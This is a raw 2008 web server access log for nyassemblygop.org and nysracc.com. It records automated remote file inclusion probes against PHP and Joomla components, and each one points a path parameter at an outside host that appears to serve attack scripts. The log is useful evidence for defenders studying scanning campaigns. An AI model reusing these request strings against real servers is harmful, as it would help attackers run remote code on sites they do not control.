213.207.110.102 - - [19/Nov/2008:05:26:36 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:05:26:42 -0800] "GET /logs//appserv/main.php?appserv_root=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:05:26:42 -0800] "GET /appserv/main.php?appserv_root=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:27:03 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nysracc.com"
213.207.110.102 - - [19/Nov/2008:05:27:05 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nysracc.com"
213.207.110.102 - - [19/Nov/2008:05:27:06 -0800] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nysracc.com"
84.21.71.133 - - [19/Nov/2008:05:27:36 -0800] "GET /logs/access.log/index2.php?pagina=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
84.21.71.133 - - [19/Nov/2008:05:27:36 -0800] "GET /logs/index2.php?pagina=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
84.21.71.133 - - [19/Nov/2008:05:27:36 -0800] "GET /index2.php?pagina=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
190.24.168.93 - - [19/Nov/2008:05:27:50 -0800] "GET /logs/access_080923.log//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
190.24.168.93 - - [19/Nov/2008:05:28:05 -0800] "GET /logs/access_080923.log//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
209.172.44.52 - - [19/Nov/2008:05:29:41 -0800] "GET /logs/access_080929.log/include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
209.172.44.52 - - [19/Nov/2008:05:29:42 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
209.172.44.52 - - [19/Nov/2008:05:29:42 -0800] "GET /logs/include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
200.87.171.78 - - [19/Nov/2008:05:29:48 -0800] "GET /logs/scripts.log//components/com_simpleboard/image_upload.php?sbp=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
200.87.171.78 - - [19/Nov/2008:05:29:48 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
200.87.171.78 - - [19/Nov/2008:05:29:48 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
206.225.91.21 - - [19/Nov/2008:05:29:56 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
206.225.91.21 - - [19/Nov/2008:05:29:56 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
206.225.91.21 - - [19/Nov/2008:05:29:56 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:05:30:18 -0800] "GET /logs/access_081021.log%20//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:05:31:22 -0800] "GET /logs/access_081021.log%20//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
70.85.149.242 - - [19/Nov/2008:05:31:26 -0800] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%bItemd%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
70.85.149.242 - - [19/Nov/2008:05:31:26 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%bItemd%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
70.85.149.242 - - [19/Nov/2008:05:31:26 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%bItemd%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
213.147.116.24 - - [19/Nov/2008:05:31:33 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
213.147.116.24 - - [19/Nov/2008:05:31:33 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
213.147.116.24 - - [19/Nov/2008:05:31:33 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:31:42 -0800] "GET /logs/access.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
89.218.85.18 - - [19/Nov/2008:05:31:42 -0800] "GET /logs/access_080926.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
209.172.44.52 - - [19/Nov/2008:05:31:49 -0800] "GET /logs/access_080920.log/include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:32:53 -0800] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
209.172.44.52 - - [19/Nov/2008:05:32:55 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
72.30.161.252 - - [19/Nov/2008:05:34:22 -0800] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.nyassemblygop.org"
206.225.91.21 - - [19/Nov/2008:05:34:49 -0800] "GET /logs/access.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "nyassemblygop.org"
118.101.42.193 - - [19/Nov/2008:05:35:03 -0800] "GET /logs//?path%5Bdocroot%5D=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 3946 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.nyassemblygop.org"
118.101.42.193 - - [19/Nov/2008:05:35:05 -0800] "GET /?path%5Bdocroot%5D=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.nyassemblygop.org"
209.172.44.52 - - [19/Nov/2008:05:36:40 -0800] "GET /logs/include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
209.172.44.52 - - [19/Nov/2008:05:36:40 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:37:47 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:37:47 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:37:47 -0800] "GET /logs/access_080911.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
190.24.168.93 - - [19/Nov/2008:05:37:47 -0800] "GET /logs/access_081021.log%20//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
190.24.168.93 - - [19/Nov/2008:05:38:08 -0800] "GET /logs/access_081021.log%20//appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:38:13 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nysracc.com"
213.207.110.102 - - [19/Nov/2008:05:38:13 -0800] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nysracc.com"
213.207.110.102 - - [19/Nov/2008:05:38:13 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nysracc.com"
206.225.91.21 - - [19/Nov/2008:05:39:01 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
206.225.91.21 - - [19/Nov/2008:05:39:01 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
206.225.91.21 - - [19/Nov/2008:05:39:01 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:41:42 -0800] "GET /logs/access_081021.log%20%20//?DOCUMENT_ROOT=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:41:42 -0800] "GET /logs//?DOCUMENT_ROOT=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 200 3946 "-" "Mozilla/5.0" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:41:42 -0800] "GET /?DOCUMENT_ROOT=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:41:50 -0800] "GET /logs/access_081021.log%20%20//?DOCUMENT_ROOT=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:41:50 -0800] "GET /logs//?DOCUMENT_ROOT=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 200 3946 "-" "Mozilla/5.0" "www.nyassemblygop.org"
213.207.110.102 - - [19/Nov/2008:05:41:51 -0800] "GET /?DOCUMENT_ROOT=http://www.irontonforge.com/McN/mcnid1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:08 -0800] "GET /logs/access_080929.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:08 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:08 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
74.52.107.130 - - [19/Nov/2008:05:43:17 -0800] "GET /logs/access_080929.log//?mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.nyassemblygop.org"
74.52.107.130 - - [19/Nov/2008:05:43:17 -0800] "GET /?mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.814" "www.nyassemblygop.org"
74.52.107.130 - - [19/Nov/2008:05:43:17 -0800] "GET /logs//?mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.814" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:18 -0800] "GET /?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:20 -0800] "GET /logs/access_080929.log//?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:20 -0800] "GET /?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:20 -0800] "GET /logs//?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
74.52.107.130 - - [19/Nov/2008:05:43:22 -0800] "GET /logs/access_080929.log//?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:23 -0800] "GET /logs/access_080929.log//?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
74.52.107.130 - - [19/Nov/2008:05:43:23 -0800] "GET /?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.814" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:23 -0800] "GET /?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:23 -0800] "GET /logs//?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
74.52.107.130 - - [19/Nov/2008:05:43:23 -0800] "GET /logs//?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.814" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:23 -0800] "GET /logs/access_080929.log/?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:23 -0800] "GET /?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:24 -0800] "GET /logs/?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 3941 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:24 -0800] "GET /logs/access_080929.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:24 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:43:24 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
206.225.91.21 - - [19/Nov/2008:05:45:13 -0800] "GET /logs/access_081009.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
206.225.91.21 - - [19/Nov/2008:05:45:45 -0800] "GET /logs/access_081002.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:45:46 -0800] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:45:46 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:45:46 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:45:55 -0800] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:45:55 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:45:55 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
74.52.107.130 - - [19/Nov/2008:05:46:21 -0800] "GET /logs/access.log//?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.nysracc.com"
74.52.107.130 - - [19/Nov/2008:05:46:21 -0800] "GET /?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.814" "www.nysracc.com"
74.52.107.130 - - [19/Nov/2008:05:46:21 -0800] "GET /logs//?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.814" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:46:35 -0800] "GET /logs/access.log//?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:46:35 -0800] "GET /logs/access.log/?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:46:35 -0800] "GET /logs/access.log//?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:46:35 -0800] "GET /?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:46:35 -0800] "GET /?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:46:35 -0800] "GET /?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:46:35 -0800] "GET /logs//?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:46:35 -0800] "GET /logs/?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 3941 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:46:35 -0800] "GET /logs//?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.805" "www.nysracc.com"
74.52.107.130 - - [19/Nov/2008:05:46:38 -0800] "GET /logs/access.log//?mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.nysracc.com"
74.52.107.130 - - [19/Nov/2008:05:46:38 -0800] "GET /?mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.814" "www.nysracc.com"
74.52.107.130 - - [19/Nov/2008:05:46:38 -0800] "GET /logs//?mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.814" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:46:39 -0800] "GET /logs/access.log/?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:46:39 -0800] "GET /?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:46:39 -0800] "GET /logs/?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 3941 "-" "libwww-perl/5.805" "www.nysracc.com"
66.244.236.243 - - [19/Nov/2008:05:46:54 -0800] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:46:54 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:46:54 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:04 -0800] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:04 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:05 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "nyassemblygop.org"
74.52.107.130 - - [19/Nov/2008:05:47:11 -0800] "GET /logs/access.log//?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "nyassemblygop.org"
74.52.107.130 - - [19/Nov/2008:05:47:12 -0800] "GET /?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.814" "nyassemblygop.org"
74.52.107.130 - - [19/Nov/2008:05:47:12 -0800] "GET /logs//?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.814" "nyassemblygop.org"
74.52.107.130 - - [19/Nov/2008:05:47:29 -0800] "GET /logs/access.log//?mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "nyassemblygop.org"
